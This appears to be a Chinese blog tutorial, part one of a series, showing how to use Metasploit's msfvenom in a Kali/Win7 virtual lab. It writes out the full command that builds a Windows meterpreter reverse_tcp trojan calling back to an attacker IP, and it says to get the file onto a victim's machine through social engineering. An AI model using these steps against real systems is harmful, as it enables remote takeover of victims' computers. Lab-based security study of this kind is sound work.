课前声明：
1、本分享仅做学习交流 ， 请自觉遵守法律法规！
2、搜索：Kali 与编程 ， 学习更多网络攻防干货！
3、Kali 与编程每天准时更新 ， 敬请学习和关注！
文章插图
正文部分
一、背景介绍
Metasploit就是一个漏洞框架 。 它的全称叫做The Metasploit Framework ， 简称叫做MSF 。 Metasploit作为全球最受欢迎的工具 ， 不仅仅是因为它的方便性和强大性 ， 更重要的是它的框架 。 它允许使用者开发自己的漏洞脚本 ， 从而进行测试 。 Metasploit(msf)究竟威力如何呢？如何利用木马控制受害者主机呢？接下来让我们一起学习！
二、资源装备
1.安装好 Win7的虚拟机一台
2.整装待发的小白一个 。
3.安装好的Kali Linux虚拟机一台 。
3、 战略安排
3.1 将受害者主机（Windows7）跟攻击者主机（Kali Linux）的网络模式全部设置为NAT模式 ， 如下图所示 。
步骤：打开虚拟机的设置/选择网络适配器/选择NAT模式 。
文章插图
3.2 利用攻击者主机（kali linux）的相关工具（msfvenom）生成对应的木马文件 ， 如下图所示 。
步骤1：msfvenom工具的参数介绍
-p, –payload < payload> 指定需要使用的payload(攻击荷载) 。 也可以使用自定义payload,几乎是支持全平台的
-o, –out < path> 指定创建好的payload的存放位置 。
-h, –help 查看帮助选项 。
文章插图
步骤2：msfvenom工具生成对应的木马文件举例 ， 如下图所示 。
文章插图
步骤3：查看攻击者主机的主机IP地址 ， 如下图所示 。
命令：ifconfig
文章插图
步骤4：利用msfvenom工具生成对应的木马文件 ， 如下图所示 。
命令：msfvenom -p 指定需要使用的payload(攻击荷载) lhost=攻击者主机IP -f exe -o 生成木马文件的保存位置
例子：msfVenom -p windows/meterpreter/reverse_tcp lhost=192.168.78.144 -f exe -o /root/hk.exe
文章插图
步骤5：msfvenom工具生成木马文件对应的命令运行结果如下图所示 。
Saved as:生成的木马文件保存路径 。
文章插图
步骤6：在已知的木马文件保存路径目录下查找对应的木马文件是否已经生成 ， 如下图所示 ， 木马文件已经存在（这里使用图形化文件管理系统来查看 ， 你也可以利用ls命令查看对应路径下面是否已经生成对应的木马文件） 。
文章插图
3.3 利用一定的社会工程学方法将生成的木马文件发送到目标受害者主机 ， 并且在受害者主机进行运行（对应的社会工程学知识请持续关注本号 ， 后续讲解）
文章插图
文章插图
PS：到此学习完毕 ， 谢谢观看 ， 获取更多干货请持续关注本号！
文章插图
【网络安全工程师演示：原来黑客是这样控制你的计算机的！（上）】原创不易 ， 各位看官记得好评加关注哦！你也可点击了解更多 ， 或搜索：Kali与编程 ， 学习更多Kali Linux渗透与白帽编程技巧哦！
文章插图

• 工程师|AWS偏爱Rust，已将Rust编译器团队负责人收入囊中
• 物流|“后疫情时代”什么值得投资？英国最大资管看好网络安全和物流行业
• 项目|明朝万达获“网络安全技术应用试点示范项目”授牌
• 喻波|明朝万达喻波受邀参加2020年中国网络安全高峰论坛
• 推荐Java工程师必看，12个Hadoop领域的上手项目
• 腾讯数据工程师推荐的Python新手入门书籍，还是首发电子版
• 腾讯游戏开发工程师：Linux 机器 CPU 毛刺问题排查
• 船舶|挪威船东协会明年起向船东提供“船舶网络安全”保险
• IT工程师都需要掌握的容器技术之Docker容器管理
• 江苏|2020江苏网络安全发展大会在无锡召开